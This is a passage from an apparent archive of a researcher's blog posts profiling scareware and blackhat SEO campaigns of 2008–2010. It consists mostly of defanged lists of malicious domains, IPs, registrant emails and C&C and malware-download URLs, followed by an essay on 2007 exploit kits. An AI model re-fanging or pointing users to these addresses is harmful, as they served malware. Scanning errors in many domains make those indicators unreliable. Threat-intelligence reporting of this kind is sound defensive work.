hxxp://ritcubav.cn 
hxxp://bibbikev.cn 
hxxp://daslulev.cn 
hxxp://naczoduv.cn 
hxxp://betjogiw.cn 
hxxp://yoqlamow.cn 
hxxp://jawjeqow.cn 
hxxp://zijmivuw.cn 
hxxp://dupgozuw.cn 
hxxp://fatnudax.cn 
hxxp://defrogax.cn 
hxxp://kalyahax.cn 
hxxp://toztipax.cn 


hxxp://gecfopax.cn 


5743 


hxxp://wuqzubex.cn 
hxxp://hexpadix.cn 
hxxp://luhnukox.cn 
hxxp://vecbibey.cn 
hxxp://dimgecey.cn 
hxxp://fammuvey.cn 
hxxp://zepfabiy.cn 
hxxp://gewvamiy.cn 
hxxp://pekzariy.cn 
hxxp://pixkinaz.cn 
hxxp://mecqulez.cn 
hxxp://yubreliz.cn 
hxxp://juvmeriz.cn 
hxxp://mafcixiz.cn 
hxxp://butlezoz.cn 
hxxp://xisqapuz.cn 
hxxp://jinkohab.cn 
hxxp://litgukab.cn 
hxxp://xojyupab.cn 
hxxp://ritlarab.cn 
hxxp://qancabeb.cn 
hxxp://xaqkabeb.cn 
hxxp://qeqyukeb.cn 
hxxp://bobhoneb.cn 


hxxp://fedpijib.cn 
5744 


hxxp://kozgewob.cn 
hxxp://mirlacub.cn 
hxxp://jokrogub.cn 
hxxp://qupbihac.cn 
hxxp://viqnijac.cn 
hxxp://bucdawac.cn 
hxxp://latzoyac.cn 
hxxp://ferkogec.cn 
hxxp://qujqugec.cn 
hxxp://fajnahec.cn 
hxxp://saybilec.cn 
hxxp://yaxxosec.cn 
hxxp://nedsicic.cn 
hxxp://cimhijic.cn 
hxxp://hertugic.cn 
hxxp://linrudoc.cn 
hxxp://mahhekoc.cn 
hxxp://pegvijuc.cn 
hxxp://camxezuc.cn 
hxxp://kossehad.cn 
hxxp://bapvusad.cn 
hxxp://coffebed.cn 
hxxp://xadjeqid.cn 
hxxp://pehxarid.cn 


hxxp://maknohod.cn 


5745 


hxxp://yujhaqod.cn 
hxxp://vevteyod.cn 
hxxp://rinmumud.cn 
hxxp://xuldeyud.cn 
hxxp://fedrujaf.cn 
hxxp://nugnosaf.cn 
hxxp://koxpelef.cn 
hxxp://tecyatef.cn 
hxxp://hemfowef.cn 
hxxp://pavlegif.cn 
hxxp://percaqof.cn 
hxxp://sizkeyof.cn 
hxxp://zugkucuf.cn 
hxxp://rijnuhuf.cn 
hxxp://cepceluf.cn 
hxxp://paghizuf.cn 
hxxp://xowjicag.cn 
hxxp://dofpalag.cn 
hxxp://hujrulag.cn 
hxxp://maxtayag.cn 
hxxp://qekvoceg.cn 
hxxp://vazwureg.cn 
hxxp://pilpuweg.cn 
hxxp://wedruweg.cn 


hxxp://cexkezeg.cn 
5746 


hxxp://mujyumig.cn 
hxxp://wintabog.cn 
hxxp://nuzmohog.cn 
hxxp://coyrekog.cn 
hxxp://tubvuxog.cn 
hxxp://zavdahug.cn 
hxxp://yukpikug.cn 
hxxp://muwsikeh.cn 
hxxp://pecculeh.cn 
hxxp://rafniteh.cn 
hxxp://nukfijih.cn 
hxxp://xetvetih.cn 
hxxp://tikbacoh.cn 
hxxp://zikwufuh.cn 
hxxp://mugyujuh.cn 
hxxp://hijoumuh.cn 
hxxp://wubxayuh.cn 
hxxp://quntoyuh.cn 
hxxp://supsizuh.cn 
hxxp://techegaj.cn 
hxxp://bixtakaj.cn 
hxxp://wuwbeqaj.cn 
hxxp://caghiqaj.cn 
hxxp://lijzarej.cn 


hxxp://lanmixej.cn 


5747 


hxxp://jutzuzej.cn 
hxxp://betkawij.cn 
hxxp://mumrojoj.cn 
hxxp://wulkukoj.cn 
hxxp://selqetuj.cn 
hxxp://zuvbowuj.cn 
hxxp://sevpohak.cn 
hxxp://qusvilak.cn 
hxxp://qowrirak.cn 
hxxp://tucgosak.cn 
hxxp://bajhukek.cn 
hxxp://qeyzecik.cn 
hxxp://pijridik.cn 
hxxp://yecgajik.cn 
hxxp://tovboqgik.cn 
hxxp://sirrotik.cn 
hxxp://pomzexik.cn 
hxxp://nopvafok.cn 
hxxp://xetmojok.cn 
hxxp://fuqzuxok.cn 
hxxp://xajkimuk.cn 
hxxp://confowuk.cn 
hxxp://pozzoxuk.cn 
hxxp://vufmikal.cn 


hxxp://korkusal.cn 
5748 


hxxp://yasdaxal.cn 
hxxp://nibnupel.cn 
hxxp://nudtagel.cn 
hxxp://zivwirel.cn 
hxxp://facjacil.cn 
hxxp://qaqdidil.cn 
hxxp://zirmidil.cn 
hxxp://pivtegil.cn 
hxxp://mutzomol.cn 
hxxp://bahfosol.cn 
hxxp://kajvatol.cn 
hxxp://keptavol.cn 
hxxp://mevvuqul.cn 
hxxp://berqufam.cn 
hxxp://zinwujam.cn 
hxxp://jormofem.cn 
hxxp://vowcajem.cn 
hxxp://yawyibim.cn 
hxxp://mibyumim.cn 
hxxp://pabfakom.cn 
hxxp://jetgekom.cn 
hxxp://xolkizom.cn 
hxxp://mujsikum.cn 
hxxp://moynukan.cn 


hxxp://ranfelan.cn 
5749 


hxxp://kayjamen.cn 
hxxp://kudcedon.cn 
hxxp://getwison.cn 
hxxp://givjivon.cn 
hxxp://faykirun.cn 
hxxp://zebxaxun.cn 
hxxp://coclecap.cn 
hxxp://texnipap.cn 
hxxp://humyipap.cn 
hxxp://duccesap.cn 
hxxp://zamyisap.cn 
hxxp://lunyicep.cn 
hxxp://ranpovep.cn 
hxxp://yifkebip.cn 
hxxp://yiryemip.cn 
hxxp://mowmogip.cn 
hxxp://wozhihop.cn 
hxxp://mefrexop.cn 
hxxp://qidyubup.cn 
hxxp://qidjohup.cn 
hxxp://lotjolup.cn 
hxxp://dirdotup.cn 
hxxp://memqowagq.cn 
hxxp://civvufeq.cn 


hxxp://bobfiliq.cn 
5750 


hxxp://borremiq.cn 
hxxp://singuroq.cn 
hxxp://qudjuvog.cn 
hxxp://vuzwesuq.cn 
hxxp://nuvmotuq.cn 
hxxp://zohcidar.cn 
hxxp://rentumar.cn 
hxxp://fipzaqar.cn 
hxxp://siqcatar.cn 
hxxp://sagvitar.cn 
hxxp://luqsiger.cn 
hxxp://zuyxewer.cn 
hxxp://jagnuyer.cn 
hxxp://ruhbulir.cn 
hxxp://sityeyir.cn 
hxxp://rosvocor.cn 
hxxp://julxapor.cn 
hxxp://rixlupur.cn 
hxxp://jutfisur.cn 
hxxp://fabmotur.cn 
hxxp://bukpuzur.cn 
hxxp://pozsigas.cn 
hxxp://nhakdugas.cn 
hxxp://lokzihas.cn 


hxxp://mukkebes.cn 


5751 


hxxp://mijpedes.cn 
hxxp://conzakes.cn 
hxxp://fodbemes.cn 
hxxp://maqpumes.cn 
hxxp://purhuves.cn 
hxxp://hohgibis.cn 
hxxp://kezyubis.cn 
hxxp://gopmocis.cn 
hxxp://soqsedis.cn 
hxxp://defdoris.cn 
hxxp://pomzonos.cn 


hxxp://lanhovus.cn 


We'll continue monitoring the campaign and post updates as soon as new developments 
take place. 


14.6.19 Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild Drops 
Scareware (2018-10-21 23:55) 

It’s 2008 and I’ve recently stumbled upon a currently active malicious and fraudulent blackhat 

SEO campaign successfully enticing users into falling victim into fake security software 

also Known as scareware including a variety of dropped fake codecs largely relying on the 


acquisition of legitimate traffic through active blackhat SEO campaigns in this particular case 
various North Korea news including Mike Tyson’s daughter themed campaigns. 


Related malicious domains and redirectors known to have participated in the campaign: 


hxxp://fi97.net 


hxxp://is-the-boss.com - Email: dantsr@gmail.com 
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Related malicious domains known to have participated in the campaign: 


hxxp://north-korea-news.moviegator.us 


Related malicious domains known to have participated in the campaign: 


hxxp://petrenko. biz 


Related malicious domains known to have participated in the campaign: 
hxxp://teensxporn.com - 66.197.165.41 - Email: robertxssmith@googlemail.com 
hxxp://aprettygirls.com 

hxxp://analporntube.com 

hxxp://tuexxxteen.com 

hxxp://1ltubexxx.com 

hxxp://teenboobstube.com 


hxxp://tubexxxteen.com 


Related rogue YouTube accounts known to have participated in the campaign: 
hxxp://www.youtube.com/user/afohebac5ar 


hxxp://www.youtube.com/user/irufupol0op 


Related malicious domains known to have participated in the campaign: 
hxxp://get-mega-tube.com - 216.240.143.7 

hxxp://get-mega-tube.com 

hxxp://my-flare-tube.com 

hxxp://best-crystal-tube.com 


hxxp://powerful-tube.com 
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hxxp://cheery-tube-portal.com 
hxxp://jazzy-tubs.com 
hxxp://video-tube-dot.com 


hxxp://my-tube-show.com 


Once executed a sample malware phones back to the following malicious C &C server 
IPs: 


hxxp://mgjmnfgbdfb.com/fff9999.php 


hxxp://mgjmnfgbdfb.com/eee9999.php 


Once executed a sample malware phones back to the following malicious C &C server 
IPs: 


hxxp://imageempires.com/perce/9dc0266f807 7f4b2cd9411ed48ecdda988af00003b1280c 
47e899830c09969686e8ccfe804c2a7ce5/c0a/perce.jpg 


hxxp://imagescolor.com/item/adb0765f302764425d74c12df84cbd29185f9070bb2230a42 
€0958e050299908de1c5f0844c2579e3/20c/item. gif 


hxxp://picturehappiness.com/werber/207/216.jpg 


hxxp://archiveexefilesO9.com/file.exe 


Related malicious URLs known to have participated in the campaign: 


hxxp://archiveexefilesO9.com/softwarefortubeview.45016.exe 


Related malicious URLs known to have participated in the campaign: 
hxxp://archiveexefilesO9.com - 91.212.65.54 
hxxp://exefilesstorage.com 

hxxp://exearchstortage.com 


hxxp://grandfilesstore.com 
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hxxp://arch-grandsoftarchive.com 
hxxp://nex-programmers.com 


hxxp://kir-fileplanet.com 


We'll continue monitoring the campaign and post updates as soon as new developments 
take place. 


14.6.20 Historical OSINT - A Diversified Portfolio of Fake Security Software 
(2018-10-22 13:33) 

It’s 2010 and I’ve recently stumbled upon a currently active and circulating malicious and 

fraudulent porfolio of fake security software also known as scareware potentially enticing 

hundreds of thousands of users to a multi-tude of malicious software with the cybercriminals 

behind the campaign potentially earning fraudulent revenue in the process of monetizing 


access to malware-infected hosts largely relying on the utilization of an affiliate network-based 
type of revenue sharing scheme. 


Related malicious domains known to have participated in the campaign: 
hxxp://thebest-antivirus0O0.com - 91.212.226.203; 94.228.209.195 
hxxp://virusscannerpro0.com 

hxxp://lightandfastscanner01.com 

hxxp://thebest-antivirusO1l.com 

hxxp://thebestantivirusO1l.com 

hxxp://remove-spyware-11.com 

hxxp://remove-virus-11.com 

hxxp://thebest-antivirus11.com 

hxxp://antispyware-modulel.com 
hxxp://antisoywaremodulel.com 

hxxp://antivirus-toolsr1.com 


hxxp://thebest-antivirus1.com 
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hxxp://thebest-antivirusx1.com 
hxxp://thebestantivirusO2.com 
hxxp://remove-spyware-12.com 
hxxp://remove-virus-12.com 
hxxp://delete-all-virus-22.com 
hxxp://lightandfastscanner22.com 
hxxp://prosecureprotection2.com 
hxxp://virusscannerpro2.com 
hxxp://antivirus-toolsr2.com 
hxxp://thebest-antivirusx2.com 
hxxp://thebestantivirus0O3.com 
hxxp://remove-spyware-13.com 
hxxp://remove-virus-13.com 
hxxp://antispyware-module3.com 
hxxp://antispywaremodule3.com 
hxxp://virusscannerpro3.com 
hxxp://windowsantivirusserver3.com 
hxxp://thebest-antivirusx3.com 
hxxp://thebestantivirus04.com 
hxxp://remove-spyware-14.com 
hxxp://remove-virus-14.com 
hxxp://antispyware-scann4.com 
hxxp://antivirus-toolsr4.com 
hxxp://thebest-antivirusx4.com 


hxxp://thebestantivirus0O5.com 
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hxxp://remove-all-spyware-55.com 
hxxp://delete-all-virus-55.com 
hxxp://thebest-antivirusx5.com 
hxxp://remove-spyware-16.com 
hxxp://lightandfastscanner66.com 
hxxp://antisoywaremodule6.com 
hxxp://antispoyware-module7.com 
hxxp://antispoywaremodule7.com 
hxxp://antivirus-toolsr7.com 
hxxp://antispyware-scann8.com 


hxxp://pro-secure-protection8.com 


hxxp://windowsantivirusserver8.com 


hxxp://antispyware-module9.com 
hxxp://antisoywaremodule9.com 
hxxp://antispyware-scann9.com 
hxxp://virusscannerpro9.com 
hxxp://antivirus-toolsr9.com 
hxxp://thebest-antivirus9.com 
hxxp://antivirusprolscan.com 
hxxp://antiviruspro2scan.com 
hxxp://antiviruspro7scan.com 
hxxp://antiviruspro8scan.com 
hxxp://antiviruspro9scan.com 
hxxp://antispyware6sacnner.com 


hxxp://antivirusvltools.com 
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hxxp://antispywarelOwindows.com 
hxxp://antispyware20windows.com 
hxxp://antivirus-toolsvv.com 
hxxp://remove-spyware-11.com 
hxxp://remove-virus-11.com 
hxxp://remove-spyware-12.com 
hxxp://remove-virus-12.com 
hxxp://delete-all-virus-22.com 
hxxp://prosecureprotection2.com 
hxxp://remove-spyware-13.com 
hxxp://remove-virus-13.com 
hxxp://windowsantivirusserver3.com 
hxxp://remove-spyware-14.com 
hxxp://remove-virus-14.com 
hxxp://remove-all-spyware-55.com 
hxxp://delete-all-virus-55.com 
hxxp://remove-spyware-16.com 
hxxp://pro-secure-protection8.com 
hxxp://windowsantivirusserver8.com 
hxxp://antivirus-toolsr9.com 
hxxp://antivirusv1ltools.com 
hxxp://antispywarelOwindows.com 
hxxp://antispyware20windows.com 


hxxp://antivirus-toolsvv.com 
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Related malicious domains known to have participated in the campaign: 


hxxp://run-antivirusscan0.com 
hxxp://runantivirusscan0.com 
hxxp://remove-spyware-11.com 
hxxp://remove-virus-11.com 
hxxp://run-virus-scannerl.com 
hxxp://remove-spyware-12.com 
hxxp://remove-virus-12.com 
hxxp://delete-all-virus-22.com 
hxxp://remove-spyware-13.com 
hxxp://remove-virus-13.com 
hxxp://runantivirusscan3.com 
hxxp://run-virusscanner3.com 
hxxp://remove-spyware-14.com 
hxxp://remove-virus-14.com 
hxxp://run-virusscanner4.com 
hxxp://remove-virus-15.com 
hxxp://remove-all-spyware-55.com 
hxxp://delete-all-virus-55.com 
hxxp://remove-spyware-16.com 
hxxp://run-virus-scanner6.com 
hxxp://run-virusscanner6.com 
hxxp://runantivirusscan8.com 
hxxp://run-virus-scanner8.com 


hxxp://windowsantivirusserver8.com 
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hxxp://run-virus-scanner9.com 


hxxp://run-virusscanner9.com 


Related malicious domains known to have participated in the campaign: 
hxxp://run-antivirusscan0.com 
hxxp://run-antivirusscanl.com 
hxxp://run-antivirusscan3.com 
hxxp://run-antivirusscan6.com 
hxxp://run-antivirusscan8.com 
hxxp://runantivirusscan0.com 
hxxp://runantivirusscan3.com 
hxxp://runantivirusscan4.com 
hxxp://runantivirusscan9.com 


hxxp://securepro-antivirusl.com 


Related malicious domains known to have participated in the campaign: 
hxxp://anti-virus-system0.com 

hxxp://run-antivirusscan0.com 

hxxp://runantivirusscan0.com 

hxxp://perform-antivirus-scan-1.com 

hxxp://remove-spyware-11.com 

hxxp://remove-virus-11.com 

hxxp://antivirus-system1.com 

hxxp://performspywarescanl.com 


hxxp://run-virus-scannerl.com 
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hxxp://remove-spyware-12.com 
hxxp://remove-virus-12.com 
hxxp://delete-all-virus-22.com 
hxxp://antivirus-scanner-3.com 
hxxp://remove-spyware-13.com 
hxxp://remove-virus-13.com 
hxxp://runantivirusscan3.com 
hxxp://run-virusscanner3.com 
hxxp://remove-spyware-14.com 
hxxp://remove-virus-14.com 
hxxp://gloriousantivirus2014.com 
hxxp://run-virusscanner4.com 
hxxp://smart-pcscanner05.com 
hxxp://remove-virus-15.com 
hxxp://remove-all-spyware-55.com 
hxxp://delete-all-virus-55.com 
hxxp://perform-virus-scan5.com 
hxxp://perform-antivirus-scan-6.com 
hxxp://antivirus-scanner-6.com 
hxxp://remove-spyware-16.com 
hxxp://run-virus-scanner6.com 
hxxp://run-virusscanner6.com 
hxxp://antivirus-scan-server6.com 
hxxp://perform-antivirus-scan-7.com 


hxxp://perform-antivirus-test-7.com 
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hxxp://antivirus-win-system7.com 


hxxp://antivirus-for-pc-8.com 


Related malicious domains known to have participated in the campaign: 
hxxp://perform-antivirus-scan-8.com 
hxxp://perform-antivirus-test-8.com 
hxxp://run-antivirusscan8.com 
hxxp://runantivirusscan8.com 
hxxp://run-virus-scanner8.com 
hxxp://windowsantivirusserver8.com 
hxxp://perform-antivirus-test-9.com 
hxxp://perform-virus-scan9.com 
hxxp://antispywareinfo9.com 
hxxp://run-virus-scanner9.com 
hxxp://run-virusscanner9.com 
hxxp://antispoyware06scan.com 
hxxp://antispywareinfo9.com 
hxxp://antivirus-for-pc-2.com 
hxxp://antivirus-for-pc-4.com 
hxxp://antivirus-for-pc-6.com 
hxxp://antivirus-for-pc-8.com 
hxxp://antiviruspro8scan.com 
hxxp://extra-antivirus-scanl.com 
hxxp://extra-security-scanb1l.com 


hxxp://run-antivirusscan0.com 
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hxxp://run-antivirusscanl.com 
hxxp://run-antivirusscan3.com 
hxxp://run-antivirusscan6.com 
hxxp://run-antivirusscan8.com 
hxxp://runantivirusscan0.com 
hxxp://runantivirusscan3.com 
hxxp://runantivirusscan4.com 
hxxp://runantivirusscan9.com 
hxxp://securepro-antivirus1.com 
hxxp://super-scanner-2004.com 
hxxp://top-rateanrivirusO.com 


hxxp://topantimalware-scanner7.com 


We'll continue monitoring the campaign and post updates as soon as new developments 
take place. 


14.6.21 Historical OSINT - A Diversified Portfolio of Fake Security Software Spotted 
in the Wild (2018-10-22 13:40) 

It’s 2010 and I’ve recently stumbled upon yet another malicious and fraudulent domain port- 

folio serving a variety of fake security software also known as scareware potentially exposing 

hundreds of thousands of users to a variety of fake security software with the cybercriminals 


behind the campaign potentially earning fraudulent revenue largely relying on the utilization 
of an affiliate-network based type of revenue-sharing scheme. 


Related malicious domains known to have participated in the campaign: 
hxxp://50virus-scanner.com 

hxxp://700virus-scanner.com 

hxxp://antivirus-test66.com 


hxxp://antivirus200scanner.com 
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hxxp://antivirus600scanner.com 
hxxp://antivirus800scanner.com 
hxxp://antivirus900scanner.com 
hxxp://av-scanner200.com 
hxxp://av-scanner300.com 
hxxp://av-scanner400.com 
hxxp://av-scanner500.com 
hxxp://inetproscan031.com 
hxxp://internet-scan020.com 
hxxp://novirus-scan00.com 
hxxp://stopvirus-scanl1.com 
hxxp://stopvirus-scanl13.com 
hxxp://stopvirus-scanl6.com 
hxxp://stopvirus-scan33.com 
hxxp://virus66scanner.com 
hxxp://virus77scanner.com 
hxxp://virus88scanner.com 
hxxp://antivirus-scan200.com 
hxxp://antispy-scan200.com 
hxxp://av-scanner200.com 
hxxp://av-scanner300.com 
hxxp://antivirus-scan400.com 
hxxp://antispy-scan400.com 
hxxp://av-scanner400.com 


hxxp://av-scanner500.com 
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hxxp://antivirus-scan600.com 
hxxp://antispy-scan600.com 
hxxp://antivirus-scan700.com 
hxxp://antispy-scan700.com 
hxxp://av-scanner700.com 
hxxp://antispy-scan800.com 
hxxp://antivirus-scan900.com 
hxxp://novirus-scan00.com 
hxxp://stop-virus-010.com 


hxxp://spywarescan010.com 


Related malicious domains known to have participated in the campaign: 


hxxp://antispywarehelp010.com 
hxxp://internet-scan020.com 
hxxp://internet-scanner020.com 
hxxp://insight-scan20.com 
hxxp://internet-scanner030.com 
hxxp://stop-virus-040.com 
hxxp://internet-scan040.com 
hxxp://insight-scan40.com 
hxxp://internet-scan050.com 
hxxp://internet-scanner050.com 
hxxp://insight-scan60.com 
hxxp://stop-virus-070.com 


hxxp://internet-scan070.com 
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hxxp://internet-scanner070.com 
hxxp://insight-scan80.com 
hxxp://stop-virus-090.com 
hxxp://internet-scan090.com 
hxxp://internet-scanner090.com 
hxxp://insight-scan90.com 
hxxp://antispywarehelpk0.com 
hxxp://inetproscan001.com 
hxxp://novirus-scan01.com 
hxxp://spyware-stop01.com 
hxxp://antivirus-inetO1.com 
hxxp://stopvirus-scanl1.com 
hxxp://inetproscan031.com 
hxxp://novirus-scan31.com 
hxxp://antivirus-inet31.com 
hxxp://novirus-scan41.com 
hxxp://antivirus-inet41.com 
hxxp://antivirus-inet51.com 
hxxp://inetproscan061.com 


hxxp://novirus-scan61.com 


Related malicious domains known to have participated in the campaign: 
hxxp://inetproscan081.com 
hxxp://novirus-scan81.com 


hxxp://inetproscan091.com 
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hxxp://spyware-stopb1.com 
hxxp://spyware-stopm1.com 
hxxp://spyware-stopn1.com 
hxxp://spyware-stopz1.com 
hxxp://antispywarehelp002.com 
hxxp://antispywarehelp022.com 
hxxp://novirus-scan22.com 
hxxp://antispywarehelpk2.com 
hxxp://insight-scanner2.com 
hxxp://spywarescan013.com 
hxxp://stopvirus-scanl13.com 
hxxp://novirus-scan33.com 
hxxp://stopvirus-scan33.com 
hxxp://antispywarehelp004.com 
hxxp://antispywarehelpk4.com 
hxxp://spywarescan015.com 
hxxp://novirus-scan55.com 
hxxp://insight-scanner5.com 
hxxp://stopvirus-scanl6.com 
hxxp://stopvirus-scan66.com 
hxxp://antispywarehelpk6.com 
hxxp://spywarescan017.com 
hxxp://insight-scanner7.com 
hxxp://antispywarehelp008.com 


hxxp://spywarescan018.com 


5767 


hxxp://stopvirus-scanl18.com 
hxxp://novirus-scan88.com 
hxxp://stopvirus-scan88.com 
hxxp://antivirus-test88.com 
hxxp://antispywarehelpk8.com 
hxxp://insight-scanner8.com 


hxxp://insight-scanner9.com 


Related malicious domains known to have participated in the campaign: 
hxxp://LOscanantispyware.com 
hxxp://20scanantispyware.com 
hxxp://30scanantispyware.com 
hxxp://60scanantispyware.com 
hxxp://80scanantispyware.com 
hxxp://2scanantispyware.com 
hxxp://3scanantispyware.com 
hxxp://5scanantispyware.com 
hxxp://7scanantispyware.com 
hxxp://8scanantispyware.com 
hxxp://spyware200scan.com 
hxxp://spyware500scan.com 
hxxp://spyware800scan.com 
hxxp://spyware880scan.com 
hxxp://50virus-scanner.com 


hxxp://90virus-scanner.com 
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hxxp://antivirus900scanner.com 
hxxp://antiviruslOscanner.com 
hxxp://virus77Sscanner.com 
hxxp://virus88scanner.com 
hxxp://netOOlantivirus.com 
hxxp://netO1llantivirus.com 
hxxp://netl1lantivirus.com 
hxxp://netO21lantivirus.com 
hxxp://net-O2antivirus.com 
hxxp://net222antivirus.com 
hxxp://net-O4antivirus.com 
hxxp://net-O5antivirus.com 


hxxp://net-07antivirus.com 


We'll continue monitoring the campaign and post updates as soon as new developments 
take place. 


14.6.22 Historical OSINT - Massive Blackhat SEO Campaign Spotted in the Wild 
Serves Scareware (2018-10-22 14:05) 


It’s 2010 and I’ve recently stumbled upon a currently active and circulating malicious and 
fraudulent blackhat SEO campaign successfully enticing hundreds of thousands globally into 
interacting with a multi-tude of rogue and malicious software also known as scareware. 


In this post I'll profile the campaign discuss in-depth the tactics techniques and proce- 
dures of the cybercriminals behind it and provide actionable intelligence on the infrastructure 
behind it. 


Related malicious domains known to have participated in the campaign: 
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hxxp://ozeqiod.cn?uid=213 - redirector - 64.86.25.201 - hxxp://bexwuq.cn 


Sample URL redirection chain: 


hxxp://ymarketcoms.cn/?pid=123 


Related malicious domains known to have responded to the same malicious C &C server IPs 
(64.86.25.201): 


hxxp://bombas101.com 
hxxp://trhtrtrotrtbtb.com 
hxxp://opensearch-zone.com 
hxxp://imaera.cn 
hxxp://ariexa.cn 
hxxp://ozeqiod.cn 
hxxp://ariysle.cn 
hxxp://ajegif.cn 
hxxp://adiyki.cn 
hxxp://acaisek.cn 
hxxp://yvamuer.cn 
hxxp://protectinstructor.cn 
hxxp://blanshinblansh.net 


hxxp://kostinporest.net 


Related malicious domains known to have participated in the campaign: 
hxxp://azikyxa.cn 
hxxp://befagki.cn 


hxxp://ataini.cn 
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hxxp://atoycri.cn 
hxxp://bimpuj.cn 
hxxp://bekajop.cn 
hxxp://bexwuq.cn 
hxxp://azywoax.cn 


hxxp://azaijy.cn 


We'll continue monitoring the campaign and post updates as soon as new developments 
take place. 


14.6.23 Historical OSINT - Malicious Economies of Scale - The Emergence of Efficient 
Platforms for Exploitation - 2007 (2018-10-22 16:23) 


Dear blog readers it’s been several years since | last posted a quality update following my 
[1]2010 disappearance. As it’s been quite a significant period of time since | last posted a 
quality update | feel it’s about time | post an quality update by detailing the Web Malware 
Exploitation market segment circa 2007 prior to my visit to the GCHQ as an independent 
contractor with the [2]JHoneynet Project. 


In this post I’ll discuss the rise of Web malware exploitation kits circa 2007 and offer in- 
depth discussion on the current and emerging tactics techniques and procedures (TTPs) of the 
cybercriminals behind it. With cybercriminals continuing to actively rely on the exploitation 
of patched and outdated vulnerabilities and with end users continuing to actively utilize 
unpatched and outdated third-party software it shouldn’t be surprising that today’s botnets 
remain relatively easy to generate and orchestrate for the purpose of committing financial 
fraud. 


Malicious Economies of Scale literally means utilizing attack techniques and exploitation 
approaches to efficiently, yet cost and time effectively, infect or abuse as many victims as 
possible, in a combination with an added layer of improved metrics on the success of the 
campaigns. What are the most popular web exploitation kits that malicious parties use to 
achieve this? Which are the most popular vulnerabilities used in the majority of the kits? What 
are the most popular techniques for embedding malware? This white paper will outline this 
efficiency-centered attack model, and will cover web application vulnerabilities, client-side 
vulnerabilities, malvertising and black hat SEO (search engine optimization). 
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An overview of the threats posed by rising number of malware embedded sites, with a 
discussion of the exploitation techniques and kits used, as well as detailed summaries of all 
the high-profile such attacks during 2007. 


01. Reaching the Efficiency Scale Through a Diverse Set of Exploited Vulnerabilities 


2007 was the year in which client-side vulnerabilities significantly replaced server-side 
ones as the preferred choice of malicious attackers on their way to achieve the highest 
possible attack success rate, while keeping their investment in terms of know-how and 
personal efforts to the minimum. Among the most successful such attacks during 2007 was 
Storm Worm, the perfect example that the use of outdated and already patched vulnerabilities 
can result in aggregating the world’s largest botnet according to industry and independent 
researchers’ estimates. By itself, this attack technique is in direct contradiction with the 
common wisdom that zero day vulnerabilities are more dangerous than already patched ones, 
however, the gang behind Storm Worm quickly envisioned this biased statement as false, and 
by standardizing the exploitation process with the help of outdated vulnerabilities achieved 
an enormous success. 


Years ago, whenever, a vulnerability was found and exploit code released in the wild, 
malicious attackers used to quickly released a do-it-yourself exploitation kit to take advantage 
of a single exploit only. Nowadays, that’s no longer the case, since by using a single exploit 
whether an outdated, or zero day one, they’re significantly limiting the probability for a 
successful attack, and therefore the more diverse and served on-the-fly is the set of exploits 
used in an attack, the higher would the success rate be. 


What was even more interesting to monitor during 2007, was the rise of high-profile sites 
serving malware, and the decline of malware coming from bogus ones. From the [3]Massive 
Embedded Malware Attack at a large Italian ISP to the Bank of India, the Syrian Embassy 
in the U.K, the U.S Consulate in St. Petersburg, China’s CSIRT, Possibility Media’s entire 
portfolio of E-zines, to the French government’s site related to Lybia, these trusted web sites 
were all found to serve malware though an embedded link pointing back to the attacker’s 
malicious server. Let’s clarify what malicious economies of scale means, and how do they do 
it. 


02. What is malicious economies of scale, and how is it achieved? 


Malicious economies of scale is a term | coined in 2007 to summarize the ongoing trend 
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of efficiently attacking online users, by standardizing the exploitation process, and by doing 
so, not just lowering the entry barriers into the process of exploiting a large number of users, 
but also, maintaining a rather static success rate of infections. Malicious economies of scale 
is the efficient way by which a large number of end users get infected, or have their online 
abused, with the malicious parties maintaining a static attack model. It’s perhaps more 
important to also describe how is the process achieved at the first place? The first strategy 
applied has to do with common sense in respect to the most popular software applications 
present at the end user’s end, and the first touch-point in this case would be the end user’s 
Internet browser. 


Having its version easily detected and exploit served, one that’s directly matching the 
vulnerable version, is among the web exploitation kits main functionalities. Let’s continue with 
the second strategy, namely to increase the probability of success. As I’ve already pointed 
out, do-it-yourself single vulnerability exploiting tools matured into web exploitation malware 
kits, now backed up with a diverse set of exploits targeting different client-side applications, 
which in this case is the process of increasing the probability of successful infection. The 
third strategy has to do with attracting the traffic to the malicious server, that as I’ve already 
discussed is already automatically set to anticipate the upcoming flood of users and serve the 
malware through exploiting client-side software vulnerabilities on their end. This is mainly 
done through exploiting remote file inclusion vulnerabilities within the high-profile targets, or 
through remotely exploitable web application vulnerabilities to basically embed a single line 
of code, or an obfuscated javascript that when deobfuscated will load the malicious URL in 
between loading the legitimate site. 


Popular Malware Embedded Attack Tactics 


This part of the article will briefly describe some of the most common attack tactics ma- 
licious parties use to embed links to their malicious servers on either high-profile sites, or 
any other site with a high pagerank, something they’ve started measuring as of recently 
according to threat intell assessment on an automated system to embed links based on a 
site’s popularity. 


¢ The “pull” Approach - Blackhat SEO, Harnessing the Trusted Audience of a Hacked Site 


In this tactic, malicious parties entirely rely on the end users to reach their malicious server, 
compared to the second tactic of “pushing” the malicious links to them. This is primarily 
accomplished through the use of Blackhat SEO tools generating junk content with the idea to 
successfully attract search engine traffic for popular queries, thus infecting anyone who visits 
the site, who often appear within the first twenty search results. The second “pull” approach 
such tactic is harnessing the already established trust of a site such as major news portal for 
instance, and by embedding a link to automatically load on the portal, have the users actually 


5773 


“pull” the malware for themselves 


¢ The “push” Approach - Here’s Your Malware Embedded Link 


The “push” approach’s success relies in its simple logic, with end users still worrying about 
downloading or clicking on email attachments given the overall lack of understanding on 
how to protect from sites serving malware, it’s logical to consider that basically sending a 
link which once visited will automatically infect the visitor though exploiting a client-side 
vulnerability, actually works. Storm Worm is the perfect example, and to demonstrate what 
malicious economies of scale means once again, it’s worth mentioning Storm’s approach 
of having an already infected host act as an infection vector itself, compared to its authors 
having to register multiple domains and change them periodically. The result is malware 
embedded links exploiting client-side vulnerabilities in the form of an IP address, in this case 
an already infected host that’s now aiming to infect another one 


¢ Automatically Exploiting Web Application Vulnerabilities - Mass SQL Injection Attacks 


As I’ve already pointed out, malicious parties are not just efficiently scanning for remotely 
exploitable web application vulnerabilities or looking for ways to remotely include files on 
any random host, they’ve started putting efforts into analyzing the page rank, and overall 
popularity of a site they could exploit. This prioritizing of the sites to be used for a “pull” 
tactic is aiming to achieve the highest possible success rate by targeting a high-trafficked 
site, where even though the attack can be detected, the “window of opportunity” while the 
users were also accessing the malicious server could be far more beneficial than having a 
permanent malware link on a less popular site for an indefinite period of time. 


¢ Malicious Advertisements - Malvertising 


Among the most popular traffic acquisition tactics nowadays remain the active utilization of 
legitimate Web properties for the purpose of socially engineering an ad network provider into 
